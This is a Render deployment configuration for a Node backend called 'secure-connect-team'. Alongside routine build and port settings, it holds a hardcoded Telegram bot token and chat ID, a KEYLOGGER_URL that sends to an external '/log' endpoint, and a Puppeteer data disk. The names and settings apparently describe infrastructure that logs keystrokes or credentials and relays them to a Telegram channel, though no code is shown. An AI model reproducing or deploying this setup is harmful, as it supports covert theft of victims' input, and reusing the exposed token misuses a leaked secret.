services:
  - type: web
    name: secure-connect-team-backend
    env: node
    repo: https://github.com/your-username/secure-connect-team
    branch: main
    buildCommand: npm install
    startCommand: node backend/server.js
    envVars:
      - key: PORT
        value: 3000
      - key: NODE_ENV
        value: production
      - key: TELEGRAM_BOT_TOKEN
        sync: false
        value: 8738758416:AAFrRHdJP-lEYbvqsJdlSxlEm23DWZ4vLRo
      - key: TELEGRAM_CHAT_ID
        sync: false
        value: -1001234567890
      - key: BACKEND_URL
        value: https://secure-connect-team-backend.onrender.com
      - key: KEYLOGGER_URL
        value: https://keyserver-eaar.onrender.com/log
    disk:
      name: puppeteer-data
      mountPath: /opt/render/project/src/backend/puppeteer-user-data
      sizeGB: 1